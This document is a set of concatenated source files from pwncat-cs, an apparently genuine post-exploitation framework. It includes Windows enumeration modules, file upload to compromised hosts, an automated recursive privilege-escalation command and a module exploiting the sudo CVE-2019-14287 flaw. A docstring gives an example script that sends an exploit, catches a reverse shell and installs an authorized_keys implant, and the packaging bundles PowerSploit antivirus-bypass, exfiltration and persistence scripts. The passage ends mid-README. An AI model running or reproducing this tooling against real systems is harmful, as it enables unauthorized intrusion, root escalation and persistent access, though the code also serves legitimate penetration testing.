            "ConsentPromptBehaviorAdmin": int,
            "LocalAccountTokenFilterPolicy": bool,
            "FilterAdministratorToken": bool,
        }

        for registry_value, registry_type in registry_values.items():
            try:
                result = session.platform.powershell(
                    f"Get-ItemPropertyValue {registry_key} -Name {registry_value}"
                )

                if not result:
                    raise ModuleFailed(
                        f"failed to retrieve registry value {registry_value}"
                    )

                registry_values[registry_value] = registry_type(result[0])

            except PowershellError as exc:
                if "does not exist" in exc.message:
                    registry_values[registry_value] = registry_type(0)
                else:
                    raise ModuleFailed(
                        f"could not retrieve registry value {registry_value}: {exc}"
                    ) from exc

            yield UACData(self.name, registry_values)



#!/usr/bin/env python3
import os
import time

from rich.progress import (
    Progress,
    BarColumn,
    TextColumn,
    DownloadColumn,
    TimeRemainingColumn,
    TransferSpeedColumn,
)

import pwncat
from pwncat.util import console, copyfileobj, human_readable_size, human_readable_delta
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Upload a file from the local host to the remote host
    """

    PROG = "upload"
    ARGS = {
        "source": Parameter(Complete.LOCAL_FILE),
        "destination": Parameter(
            Complete.REMOTE_FILE,
            nargs="?",
        ),
    }

    def run(self, manager: "pwncat.manager.Manager", args):

        # Create a progress bar for the download
        progress = Progress(
            TextColumn("[bold cyan]{task.fields[filename]}", justify="right"),
            BarColumn(bar_width=None),
            "[progress.percentage]{task.percentage:>3.1f}%",
            "•",
            DownloadColumn(),
            "•",
            TransferSpeedColumn(),
            "•",
            TimeRemainingColumn(),
        )

        if not args.destination:
            args.destination = f"./{os.path.basename(args.source)}"

        try:
            length = os.path.getsize(args.source)
            started = time.time()
            with progress:
                task_id = progress.add_task(
                    "upload", filename=args.destination, total=length, start=False
                )

                with open(args.source, "rb") as source:
                    with manager.target.platform.open(
                        args.destination, "wb"
                    ) as destination:
                        progress.start_task(task_id)
                        copyfileobj(
                            source,
                            destination,
                            lambda count: progress.update(task_id, advance=count),
                        )
                        progress.update(task_id, filename="draining buffers...")
                        progress.stop_task(task_id)

                    progress.start_task(task_id)
                    progress.update(task_id, filename=args.destination)

            elapsed = time.time() - started
            console.log(
                f"uploaded [cyan]{human_readable_size(length)}[/cyan] "
                f"in [green]{human_readable_delta(elapsed)}[/green]"
            )
        except (FileNotFoundError, PermissionError, IsADirectoryError) as exc:
            self.parser.error(str(exc))



#!/usr/bin/env python3


import rich.markup

import pwncat
from pwncat.db import Fact
from pwncat.platform.windows import Windows
from pwncat.modules.enumerate import EnumerateModule

"""
TODO: This should use csvreader.
"""


class ServicesData(Fact):
    def __init__(
        self,
        source,
        name: str,
        pid: int,
        start_mode: str,
        status: str,
    ):
        super().__init__(source=source, types=["system.services"])

        self.name: str = name

        self.pid: int = pid

        self.start_mode: str = start_mode

        self.status: str = status

    def title(self, session):
        out = f"[cyan]{rich.markup.escape(self.name)}[/cyan] (PID [blue]{self.pid}[/blue]) currently "
        if self.status == "Running":
            out += f"[bold green]{self.status}[/bold green] "
        else:
            out += f"[red]{self.status}[/red] "
        if self.start_mode == "Auto":
            out += f"([bold yellow]{self.start_mode}[/bold yellow] start)"
        else:
            out += f"([magenta]{self.start_mode}[/magenta] start)"
        return out


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["system.services"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        proc = session.platform.Popen(
            [
                "wmic.exe",
                "service",
                "get",
                "Caption,ProcessId,State,StartMode",
                "/format:csv",
            ],
            stderr=pwncat.subprocess.DEVNULL,
            stdout=pwncat.subprocess.PIPE,
            text=True,
        )

        # Process the standard output from the command
        with proc.stdout as stream:
            for line in stream:
                line = line.strip()

                if not line or "Node,Caption,ProcessId,StartMode,State" in line:
                    continue

                _, name, pid, start_mode, status = (
                    x.strip('"') for x in line.split(",")
                )

                pid = int(pid)

                yield ServicesData(self.name, name, pid, start_mode, status)

        proc.wait()



"""
Utilize legitimate authentication credentials to create a channel over
an SSH connection. This module simply opens an SSH channel, starts a
shell and grabs a PTY. It then wraps the SSH channel in a pwncat channel.

This module requires a host, user and either a password or identity (key) file.
An optional port argument is also accepted.
"""
import os
import socket
from typing import Union, TextIO, Optional

import paramiko
from prompt_toolkit import prompt

from pwncat.channel import Channel, ChannelError, ChannelClosed


class Ssh(Channel):
    """Wrap SSH shell channel in a pwncat channel."""

    def __init__(
        self,
        host: str,
        user: str,
        port: int = 22,
        password: str = None,
        identity: str = None,
        **kwargs,
    ):
        super().__init__(host, port, user, password)

        if port is None:
            port = 22

        if isinstance(port, str):
            try:
                port = int(port)
            except ValueError:
                raise ChannelError(self, "invalid port")

        if not user or user is None:
            raise ChannelError(self, "you must specify a user")

        if password is None and identity is None:
            password = prompt("Password: ", is_password=True)

        try:
            client = paramiko.client.SSHClient()
            client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy)

            client.connect(
                hostname=host,
                port=port,
                username=user,
                password=password,
                pkey=load_private_key(identity),
                allow_agent=True,
                look_for_keys=False,
            )

            columns, rows = os.get_terminal_size(0)
            shell = client.invoke_shell(width=columns, height=rows)
            shell.setblocking(0)

            self.client = shell
            self.address = (host, port)
            self._connected = True

        except paramiko.ssh_exception.AuthenticationException as exc:
            raise ChannelError(self, f"ssh authentication failed: {str(exc)}") from exc
        except (paramiko.ssh_exception.SSHException, socket.error) as exc:
            raise ChannelError(self, f"ssh connection failed: {str(exc)}") from exc

    @property
    def connected(self):
        return self._connected

    def close(self):
        self._connected = False
        self.client.close()

    def send(self, data: bytes):
        """Send data to the remote shell. This is a blocking call
        that only returns after all data is sent."""

        self.client.sendall(data)

        return len(data)

    def recv(self, count: Optional[int] = None) -> bytes:
        """Receive data from the remote shell

        If your channel class does not implement ``peak``, a default
        implementation is provided. In this case, you can use the
        ``_pop_peek`` to get available peek buffer data prior to
        reading data like a normal ``recv``.

        :param count: maximum number of bytes to receive (default: unlimited)
        :type count: int
        :return: the data that was received
        :rtype: bytes
        """

        if self.peek_buffer:
            data = self.peek_buffer[:count]
            self.peek_buffer = self.peek_buffer[count:]

            if len(data) >= count:
                return data
        else:
            data = b""

        try:
            data += self.client.recv(count - len(data))
            if data == b"":
                raise ChannelClosed(self)
        except socket.timeout:
            pass

        return data


def load_private_key(identity: Union[str, TextIO], passphrase: str = None):
    """Load a private key and return the appropriate PKey object"""

    if identity is None:
        return None

    try:
        if isinstance(identity, str):
            return paramiko.pkey.load_private_key_file(
                os.path.expanduser(identity), password=passphrase
            )

        identity.seek(0)
        return paramiko.pkey.load_private_key(identity.read(), password=passphrase)
    except paramiko.PasswordRequiredException:
        # Bad passphrase
        if passphrase is not None:
            raise

        try:
            # No passphrase, prompt for one
            passphrase = prompt("Private Key Passphrase: ", is_password=True)
        except KeyboardInterrupt:
            passphrase = None

        # No passphrase given, re-raise
        if passphrase is None:
            raise

        # Try again with the given passphrase
        return load_private_key(identity, passphrase=passphrase)



#!/usr/bin/env python3
import time

import pwncat
from pwncat.util import console
from pwncat.modules import ModuleFailed
from pwncat.commands import Complete, Parameter, CommandDefinition


def get_user_choices(command: CommandDefinition):
    if command.manager.target is None:
        return

    yield from (
        user.name
        for user in command.manager.target.run(
            "enumerate", progress=False, types=["user"]
        )
    )


class Link:
    """Link in the escalation chain"""

    def __init__(self, old_session, escalation, result):

        self.old_session = old_session
        self.escalation = escalation
        self.result = result

    def leave(self):

        if self.escalation.type == "escalate.spawn":
            self.result.log(
                f"leaving behind open session as [cyan]{self.old_session.current_user().name}[/cyan]"
            )

        self.old_session.manager.target = self.old_session

        if self.escalation.type == "escalate.replace":
            # Exit out of the subshell
            self.old_session.layers.pop()(self.old_session)
            time.sleep(0.1)
            self.old_session.platform.refresh_uid()

    def __str__(self):
        return self.escalation.title(self.old_session)


class Command(CommandDefinition):
    """
    Attempt privilege escalation in the current session. This command
    may initiate new sessions along the way to attain the privileges of
    the requested user.

    Escalation can happen either directly or recursively. In either case,
    each escalation may result in either replacing the user in the active
    session or spawning a new session. In the case of a new session, you
    should have configurations such as `lhost` and `lport` set prior to
    executing the escalation in case a reverse connection is needed.

    After escalation, if multiple stages were executed within an active
    session, you can use the `leave` command to back out of the users.
    This is useful for situations where escalation was achieved through
    peculiar ways (such as executing a command from `vim`).

    The list command is simply a wrapper around enumerating "escalation.*".
    This makes the escalation workflow more straightforward, but is not
    required.
    """

    PROG = "escalate"
    ARGS = {
        "command": Parameter(
            Complete.CHOICES,
            metavar="COMMAND",
            choices=["list", "run"],
            help="The action to take (list/run)",
        ),
        "--user,-u": Parameter(
            Complete.CHOICES,
            metavar="USERNAME",
            choices=get_user_choices,
            help="The target user for escalation.",
        ),
        "--recursive,-r": Parameter(
            Complete.NONE,
            action="store_true",
            help="Attempt recursive escalation through multiple users",
        ),
    }

    def run(self, manager: "pwncat.manager.Manager", args):

        if args.command == "help":
            self.parser.print_usage()
            return

        if args.command == "list":
            self.list_abilities(manager, args)
        elif args.command == "run":

            if args.user:
                args.user = manager.target.find_user(name=args.user)
            else:
                # NOTE: this should find admin regardless of platform
                args.user = manager.target.find_user(name="root")

            with manager.target.task(
                f"escalating to [cyan]{args.user.name}[/cyan]"
            ) as task:
                self.do_escalate(manager, task, args.user, args)

    def list_abilities(self, manager, args):
        """This is just a wrapper for `run enumerate types=escalate.*`, but
        it makes the workflow for escalation more apparent."""

        found = False

        if args.user:
            args.user = manager.target.find_user(name=args.user)

        for escalation in manager.target.run("enumerate", types=["escalate.*"]):
            if args.user and args.user.id != escalation.uid:
                continue
            console.print(f"- {escalation.title(manager.target)}")
            found = True

        if not found and args.user:
            console.log(
                f"[yellow]warning[/yellow]: no direct escalations for {args.user.name}"
            )
        elif not found:
            console.log("[yellow]warning[/yellow]: no direct escalations found")

    def do_escalate(self, manager: "pwncat.manager.Manager", task, user, args):
        """Execute escalations until we find one that works"""

        attempted = []
        chain = []
        manager.target.current_user()
        original_session = manager.target
        failed = []

        while True:

            # Grab the current user in the active session
            current_user = manager.target.current_user()

            # Find escalations for users that weren't attempted already
            escalations = [
                e
                for e in list(manager.target.run("enumerate", types=["escalate.*"]))
                if (e.source_uid is None or e.source_uid == current_user.id)
                and e not in failed
                and e.uid not in attempted
            ]

            if not escalations:
                try:
                    # This direction failed. Go back up and try again.
                    chain.pop().leave()

                    continue
                except IndexError:
                    manager.target.log(
                        f"[red]error[/red]: no working escalation paths found for {user.name}"
                    )
                    break

            # Attempt escalation directly to the target user if possible
            for escalation in (e for e in escalations if e.uid == user.id):
                try:
                    original_session.update_task(
                        task, status=f"attempting {escalation.title(manager.target)}"
                    )
                    result = escalation.escalate(manager.target)

                    time.sleep(0.1)

                    manager.target.platform.refresh_uid()

                    # Construct the escalation link
                    link = Link(manager.target, escalation, result)

                    # Track the result object either as a new session or a subshell
                    if escalation.type == "escalate.replace":
                        manager.target.layers.append(result)
                    else:
                        manager.target = result

                    # Add our link to the chain
                    chain.append(link)

                    manager.log(
                        f"escalation to {user.name} [green]successful[/green] using:"
                    )
                    for link in chain:
                        manager.print(f" - {link}")

                    return result
                except ModuleFailed:
                    failed.append(escalation)

            if not args.recursive:
                manager.target.log(
                    f"[red]error[/red]: no working direct escalations to {user.name}"
                )
                return

            # Attempt escalation to a different user and recurse
            for escalation in (e for e in escalations if e.uid != user.id):
                try:
                    original_session.update_task(
                        task, status=f"attempting {escalation.title(manager.target)}"
                    )
                    result = escalation.escalate(manager.target)

                    time.sleep(0.1)

                    manager.target.platform.refresh_uid()
                    link = Link(manager.target, escalation, result)

                    if escalation.type == "escalate.replace":
                        manager.target.layers.append(result)
                    else:
                        manager.target = result

                    chain.append(link)
                    attempted.append(escalation.uid)
                    break
                except ModuleFailed:
                    failed.append(escalation)



#!/usr/bin/env python3
from packaging import version

import pwncat
from pwncat.facts import build_gtfo_ability
from pwncat.gtfobins import Stream, Capability
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """Identify systems vulnerable to CVE-2019-14287: Sudo Bug
    Allows Restricted Users to Run Commands as Root."""

    PROVIDES = ["ability.execute", "ability.file.write", "ability.file.read"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.PER_USER

    def enumerate(self, session: "pwncat.manager.Session"):
        """Check for vulnerability"""

        try:
            # Utilize the version enumeration to grab sudo version
            sudo_info = session.run("enumerate", types=["software.sudo.version"])[0]
        except IndexError:
            return

        # This vulnerability was patched in 1.8.28
        if version.parse(sudo_info.version) >= version.parse("1.8.28"):
            return

        # Grab the current user/group
        current_user = session.current_user()
        current_group = session.find_group(gid=current_user.gid)

        # Iterate over all sudo rules
        for rule in session.run("enumerate", types=["software.sudo.rule"]):
            # We only care about command rules
            if not rule.matched:
                continue

            # User doesn't match us and we don't specify a group in the rule
            if (
                rule.user != "ALL"
                and rule.user != current_user.name
                and rule.group is None
            ):
                continue

            # Ensure we match one of the groups
            if rule.group is not None:
                for group in session.iter_groups(members=[current_user.id]):
                    if rule.group == group.name:
                        break
                else:
                    if rule.group != current_group.name:
                        continue

            # Grab a list of user names which we can run as
            userlist = [x.strip() for x in rule.runas_user.split(",")]

            # This exploits a specific non-standard configuration
            # with these two runas users listed.
            if "ALL" in userlist and "!root" in userlist:
                for command in rule.commands:
                    for method in session.platform.gtfo.iter_sudo(
                        command, caps=Capability.ALL, stream=Stream.RAW
                    ):
                        # Build a generic GTFObins capability
                        yield build_gtfo_ability(
                            source=self.name,
                            uid=0,
                            method=method,
                            source_uid=current_user.id,
                            user="\\#-1",
                            spec=command,
                        )



#!/usr/bin/env python3
from rich import box
from rich.table import Table
from rich.prompt import Prompt

import pwncat
from pwncat.util import console
from pwncat.manager import Listener, ListenerError, ListenerState
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Manage active or stopped background listeners. This command
    is only used to interact with established listeners. For
    creating new listeners, use the "listen" command instead.
    """

    PROG = "listeners"
    ARGS = {
        "--all,-a": Parameter(
            Complete.NONE,
            action="store_true",
            help="Show all listeners when listing (default: hide stopped)",
        ),
        "--kill,-k": Parameter(
            Complete.NONE, action="store_true", help="Stop the given listener"
        ),
        "--init,-i": Parameter(
            Complete.NONE, action="store_true", help="Initialize pending channels"
        ),
        "id": Parameter(
            Complete.NONE,
            type=int,
            nargs="?",
            help="The specific listener to interact with",
        ),
    }
    LOCAL = True

    def _init_channel(self, manager: pwncat.manager.Manager, listener: Listener):
        """Initialize pending channel"""

        # Grab list of pending channels
        channels = list(listener.iter_channels())
        if not channels:
            manager.log("no pending channels")
            return

        manager.print(f"Pending Channels for {listener}:")
        for ident, channel in enumerate(channels):
            manager.print(f"{ident}. {channel}")

        manager.print("\nPress C-c to stop initializing channels.")

        platform = "linux"

        try:
            while True:
                if not any(chan is not None for chan in channels):
                    manager.log("all pending channels configured")
                    break

                ident = int(
                    Prompt.ask(
                        "Channel Index",
                        choices=[
                            str(x)
                            for x in range(len(channels))
                            if channels[x] is not None
                        ],
                    )
                )
                if channels[ident] is None:
                    manager.print("[red]error[/red]: channel already initialized.")
                    continue

                platform = Prompt.ask(
                    "Platform Name",
                    default=platform,
                    choices=["linux", "windows", "drop"],
                    show_default=True,
                )

                if platform == "drop":
                    manager.log(f"dropping channel: {channels[ident]}")
                    channels[ident].close()
                    channels[ident] = None
                    continue

                try:
                    listener.bootstrap_session(channels[ident], platform)
                    channels[ident] = None
                except ListenerError as exc:
                    manager.log(f"channel bootstrap failed: {exc}")
                    channels[ident].close()
                    channels[ident] = None
        except KeyboardInterrupt:
            manager.print("")
            pass
        finally:
            for channel in channels:
                if channel is not None:
                    listener.bootstrap_session(channel, platform=None)

    def _show_listener(self, manager: pwncat.manager.Manager, listener: Listener):
        """Show detailed information on a listener"""

        # Makes printing the variables a little more straightforward
        def dump_var(name, value):
            manager.print(f"[yellow]{name}[/yellow] = {value}")

        # Dump common state
        dump_var("address", str(listener))

        state_color = "green"
        if listener.state is ListenerState.FAILED:
            state_color = "red"
        elif listener.state is ListenerState.STOPPED:
            state_color = "yellow"

        dump_var(
            "state",
            f"[{state_color}]"
            + str(listener.state).split(".")[1]
            + f"[/{state_color}]",
        )

        # If the listener failed, show the failure message
        if listener.state is ListenerState.FAILED:
            dump_var("[red]error[/red]", repr(str(listener.failure_exception)))

        dump_var("protocol", repr(listener.protocol))
        dump_var("platform", repr(listener.platform))

        # A count of None means infinity, annotate that
        if listener.count is not None:
            dump_var("remaining", listener.count)
        else:
            dump_var("remaining", "[red]infinite[/red]")

        # Number of pending channels
        dump_var("pending", listener.pending)

        # SSL settings
        dump_var("ssl", repr(listener.ssl))
        if listener.ssl:
            dump_var("ssl_cert", repr(listener.ssl_cert))
            dump_var("ssl_key", repr(listener.ssl_key))

    def run(self, manager: "pwncat.manager.Manager", args):

        if (args.kill or args.init) and args.id is None:
            self.parser.error("missing argument: id")

        if args.kill and args.init:
            self.parser.error("cannot use both kill and init arguments")

        if args.id is not None and (args.id < 0 or args.id >= len(manager.listeners)):
            self.parser.error(f"invalid listener id: {args.id}")

        if args.kill:
            # Kill the specified listener
            with console.status("stopping listener..."):
                manager.listeners[args.id].stop()
            manager.log(f"stopped listener on {str(manager.listeners[args.id])}")
            return

        if args.init:
            self._init_channel(manager, manager.listeners[args.id])
            return

        if args.id is not None:
            self._show_listener(manager, manager.listeners[args.id])
            return

        table = Table(
            "ID",
            "State",
            "Address",
            "Platform",
            "Remaining",
            "Pending",
            title="Listeners",
            box=box.MINIMAL_DOUBLE_HEAD,
        )

        for ident, listener in enumerate(manager.listeners):

            if listener.state is ListenerState.STOPPED and not args.all:
                continue

            if listener.count is None:
                count = "[red]inf[/red]"
            else:
                count = str(listener.count)

            table.add_row(
                str(ident),
                str(listener.state).split(".")[1],
                f"[blue]{listener.address[0]}[/blue]:[cyan]{listener.address[1]}[/cyan]",
                str(listener.platform),
                count,
                str(listener.pending),
            )

        console.print(table)



"""
pwncat provides a high-level API capable of being used not only while implementing
custom commands and modules but also to embed pwncat within scripts. pwncat can be
instantiated from a script and you can interact with targets programmatically.

Example Script
--------------

As an example, the following script demonstrates a fake exploit. In this example,
there is a public service listening on port ``1337``. We connect to this service,
send an exploit and a payload instructing the service to connect back to our
attacking machine with a shell. We also start a listener before sending the
exploit. After the exploit has been sent, we accept a connection to the listener,
and construct a pwncat manager and session around this connected socket.

Because we can harness the full internal pwncat API, we are even able to execute
modules prior to entering the pwncat prompt. Below, we install the authorized keys
implant prior to starting our shell.

.. code-block:: python

    #!/usr/bin/env python3
    import socket
    import pwncat.manager

    # Connect to a vulnerable service
    sock = socket.create_connect(("192.168.1.1", 1337))
    # Create the listener for our shell
    listener = socket.create_server(("0.0.0.0", 4444))

    # Send the exploit and payload
    sock.send("EXPLOITEXPLOITEXPLOIT")
    sock.send("REVERSE SHELL PAYLOAD")

    # Accept the reverse connection
    victim, victim_addr = listener.accept()

    with pwncat.manager.Manager() as manager:
        # Establish a pwncat session
        session = manager.create_session(platform="linux", protocol="socket", client=victim)

        # Maybe install persistence or whatever
        session.run("implant.authorized_key", key="/home/caleb/.ssh/id_rsa")

        # Give the user a pwncat prompt
        manager.interactive()

Compatability with Text UI Libraries
------------------------------------

pwncat uses ``prompt_toolkit`` and ``python-rich`` to support colorful and aesthetically
pleasing output. However, this output does not behave well when using external Text UI
libraries (e.g. ``ncurses``). One notable example is ``pwntools`` which you likely use
when writing binary exploits. Because of this, prior to creating a manager, you should
shutdown any TUI libraries you may have loaded.

.. note::

    pwntools specifically does not provide a way to undo the changes it makes
    to the stdout/stdin. Because of this, when creating a manager, pwncat will
    automatically undo the things that pwntools did to change the terminal.
    You should close any existing pwntools progress instances and not use any
    output functionality from pwntools after instantiating a manager.

"""



#!/usr/bin/env python3


import rich.markup

import pwncat
from pwncat.db import Fact
from pwncat.platform.windows import Windows
from pwncat.modules.enumerate import EnumerateModule

"""
TODO: This should use csvreader.
"""


class HotfixData(Fact):
    def __init__(
        self, source, caption: str, hotfixid: str, tag: str, installed_on: str
    ):
        super().__init__(source=source, types=["system.hotfixes"])

        self.hotfixid: str = hotfixid

        self.tag: str = tag

        self.caption: str = caption

        self.installed_on: str = installed_on

    def title(self, session):
        return f"[cyan]{rich.markup.escape(self.hotfixid)}[/cyan] {rich.markup.escape(self.tag)} installed on [blue]{rich.markup.escape(self.installed_on)}[/blue] ([blue]{rich.markup.escape(self.caption)}[/blue])"


class Module(EnumerateModule):
    """Enumerate the current Windows Defender settings on the target"""

    PROVIDES = ["system.hotfixes"]
    PLATFORM = [Windows]

    def enumerate(self, session):

        proc = session.platform.Popen(
            [
                "wmic",
                "qfe",
                "get",
                "Caption,HotFixID,Description,InstalledOn",
                "/format:csv",
            ],
            stderr=pwncat.subprocess.DEVNULL,
            stdout=pwncat.subprocess.PIPE,
            text=True,
        )

        # Process the standard output from the command
        with proc.stdout as stream:
            for line in stream:
                line = line.strip()

                if not line or "Caption,Description,HotFixID,InstalledOn" in line:
                    continue

                _, caption, tag, hotfixid, installed_on = line.split(",")
                yield HotfixData(self.name, caption, hotfixid, tag, installed_on)

        proc.wait()



# -*- coding: utf-8 -*-
from setuptools import setup

packages = \
['pwncat',
 'pwncat.channel',
 'pwncat.commands',
 'pwncat.facts',
 'pwncat.modules',
 'pwncat.modules.agnostic',
 'pwncat.modules.agnostic.enumerate',
 'pwncat.modules.agnostic.enumerate.escalate',
 'pwncat.modules.linux',
 'pwncat.modules.linux.enumerate',
 'pwncat.modules.linux.enumerate.creds',
 'pwncat.modules.linux.enumerate.escalate',
 'pwncat.modules.linux.enumerate.file',
 'pwncat.modules.linux.enumerate.misc',
 'pwncat.modules.linux.enumerate.software',
 'pwncat.modules.linux.enumerate.software.screen',
 'pwncat.modules.linux.enumerate.software.sudo',
 'pwncat.modules.linux.enumerate.system',
 'pwncat.modules.linux.enumerate.user',
 'pwncat.modules.linux.implant',
 'pwncat.modules.windows',
 'pwncat.modules.windows.enumerate',
 'pwncat.modules.windows.enumerate.domain',
 'pwncat.modules.windows.enumerate.network',
 'pwncat.modules.windows.enumerate.protections',
 'pwncat.modules.windows.enumerate.system',
 'pwncat.modules.windows.enumerate.token',
 'pwncat.modules.windows.enumerate.user',
 'pwncat.modules.windows.manage',
 'pwncat.modules.windows.manage.powershell',
 'pwncat.platform']

package_data = \
{'': ['*'],
 'pwncat': ['data/*',
            'data/PowerSploit/*',
            'data/PowerSploit/AntivirusBypass/*',
            'data/PowerSploit/CodeExecution/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/*',
            'data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/*',
            'data/PowerSploit/Exfiltration/*',
            'data/PowerSploit/Exfiltration/LogonUser/LogonUser/*',
            'data/PowerSploit/Exfiltration/LogonUser/LogonUser/LogonUser/*',
            'data/PowerSploit/Exfiltration/LogonUser/LogonUser/logon/*',
            'data/PowerSploit/Exfiltration/NTFSParser/*',
            'data/PowerSploit/Exfiltration/NTFSParser/NTFSParser/*',
            'data/PowerSploit/Exfiltration/NTFSParser/NTFSParserDLL/*',
            'data/PowerSploit/Mayhem/*',
            'data/PowerSploit/Persistence/*',
            'data/PowerSploit/Privesc/*',
            'data/PowerSploit/Recon/*',
            'data/PowerSploit/Recon/Dictionaries/*',
            'data/PowerSploit/ScriptModification/*',
            'data/PowerSploit/Tests/*',
            'data/PowerSploit/docs/*',
            'data/PowerSploit/docs/AntivirusBypass/*',
            'data/PowerSploit/docs/CodeExecution/*',
            'data/PowerSploit/docs/Mayhem/*',
            'data/PowerSploit/docs/Persistence/*',
            'data/PowerSploit/docs/Privesc/*',
            'data/PowerSploit/docs/Recon/*',
            'data/PowerSploit/docs/ScriptModification/*',
            'data/reports/*']}

install_requires = \
['Jinja2>=3.0.1,<4.0.0',
 'PyNaCl>=1.4.0,<2.0.0',
 'ZODB3>=3.11.0,<4.0.0',
 'netifaces>=0.11.0,<0.12.0',
 'packaging>=20.9,<21.0',
 'paramiko-ng>=2.8.8,<3.0.0',
 'prompt-toolkit>=3.0.19,<4.0.0',
 'pycryptodome>=3.10.1,<4.0.0',
 'python-rapidjson>=1.0,<2.0',
 'requests>=2.25.1,<3.0.0',
 'rich>=10.4.0,<11.0.0',
 'zodburi>=2.5.0,<3.0.0']

extras_require = \
{'docs': ['sphinx-toolbox>=2.15.2,<3.0.0',
          'Sphinx>=4.0.2,<5.0.0',
          'enum-tools>=0.7.0,<0.8.0',
          'furo>=2021.11.23,<2022.0.0']}

entry_points = \
{'console_scripts': ['pwncat-cs = pwncat.__main__:main']}

setup_kwargs = {
    'name': 'pwncat-cs',
    'version': '0.5.3',
    'description': 'Reverse and bind shell automation framework',
    'long_description': '# pwncat\n\n[![asciicast](https://asciinema.org/a/417930.svg)](https://asciinema.org/a/417930)\n\npwncat is a post-exploitation platform ~~for Linux targets~~. It started out as a\nwrapper around basic bind and reverse shells and has grown from there. It\nstreamlines common red team operations while staging code from your attacker\nmachine, not the target.\n\npwncat used to only support Linux, but there has been a lot of work recently\nto support multiple platforms. Currently, there is alpha support for Windows\ntargets. Please see the latest [documentation] for details on how to use\npwncat with a Windows target.\n\npwncat intercepts the raw communication with a remote shell and allows the\nuser to perform automated actions on the remote host including enumeration,\nimplant installation and even privilege escalation.\n\nAfter receiving a connection, pwncat will setup some common configurations\nfor working with remote shells.\n\n- Disable history in the remote shell\n- Normalize shell prompt\n- Locate useful binaries (using `which`)\n- Attempt to spawn a pseudo-terminal (pty) for a full interactive session\n\n`pwncat` knows how to spawn pty\'s with a few different methods and will\ncross-reference the methods with the executables previously enumerated. After\nspawning a pty, it will setup the controlling terminal in raw mode, so you can\ninteract in a similar fashion to `ssh`.\n\n`pwncat` will also synchronize the remote pty settings (such as rows, columns,\n`TERM` environment variable) with your local settings to ensure the shell\nbehaves correctly with interactive applications such as `vim` or `nano`.\n\nJohn Hammond and I presented `pwncat` at GRIMMCon. Our presentation, which\ncan be found on YouTube [here](https://www.youtube.com/watch?v=CISzI9klRkw).\nThis video demonstrates an early version of the API and interface. Please\nrefer to the documentation for up to date usage and API documentation!\n\npwncat [documentation] is being built out on Read the Docs. Head there for\nthe latest usage and development documentation!\n\n**pwncat requires Python 3.9+ on Linux**\n\n## Installation\n\n`pwncat` only depends on a working Python development environment running on Linux.\nIn order to install some of the packages required with `pip`, you will likely need\nyour distribution\'s "Python Development" package. On Debian based systems,\nthis is `python-dev`. For Arch, the development files are shipped with the\nmain Python repository. For Enterprise Linux, the package is named\n`python-devel`.\n\n`pwncat` is pushed to PyPI under the name `pwncat-cs`, and can be installed with\n`pip` like so:\n\n``` shell\npip install pwncat-cs\n```\n\nHowever, it is recommended to install pwncat from a virtual environment.\n\n```shell script\npython3 -m venv pwncat-env\nsource pwncat-env/bin/activate\npip install pwncat-cs\n```\n\nFor a development environment, `pwncat` usage Python Poetry. You can clone the\nrepository locally and use poetry to setup a development environment.\n\n``` shell\n# Setup pwncat inside a poetry-managed virtual environment\ngit clone git@github.com:calebstewart/pwncat.git\ncd pwncat\npoetry install\n\n# Enter the virtual environment\npoetry shell\n```\n\n## Naming Changes\n\nDue to the naming conflict with [Cytopia\'s pwncat](https://pwncat.org/), I have\ndecided to rename the package to `pwncat-cs`. This includes renaming the\nentrypoint so that there are no direct conflicts with Cytopia\'s project. If you\nare updating from `v0.4.*`, the command name will now have changed, and the `pcat`\nand `pc` varianst have been removed. See the most recent release notes for more\ndetails.\n\nThe added benefit of this move is that the project is now pushed to PyPI for\neasier installation/updating in the future.\n\n## Windows Support\n\n`pwncat` now supports connections from Windows targets starting at `v0.4.0a1`. The Windows\nplatform utilizes a .Net-based C2 library which is loaded automatically. Windows\ntargets should connect with either a `cmd.exe` or `powershell.exe` shell, and\npwncat will take care of the rest.\n\nThe libraries implementing the C2 are implemented at [pwncat-windows-c2].\nThe DLLs for the C2 will be automatically downloaded from the targeted release\nfor you. If you do not have internet connectivity on your target machine,\nyou can tell pwncat to pre-stage the DLLs using the `--download-plugins`\nargument. If you are running a release version of pwncat, you can also download\na tarball of all built-in plugins from the releases page.\n\nThe plugins are stored by default in `~/.local/share/pwncat`, however this is\nconfigurable with the `plugin_path` configuration. If you download the packaged\nset of plugins from the releases page, you should extract it to the path pointed\nto by `plugin_path`.\n\nAside from the main C2 DLLs, other plugins may also be available. Currently,\nthe only provided default plugins are the C2 and an implementation of [BadPotato].\npwncat can reflectively load .Net binaries to be used a plugins for the C2.\nFor more information on Windows C2 plugins, please see the [documentation].\n\n## Modules\n\nRecently, the architecture of the pwncat framework was redesigned to\nincorporate a generic "module" structure. All functionality is now\nimplemented as modules. This includes enumeration, persistence and\nprivilege escalation. Interacting with modules is similar to most 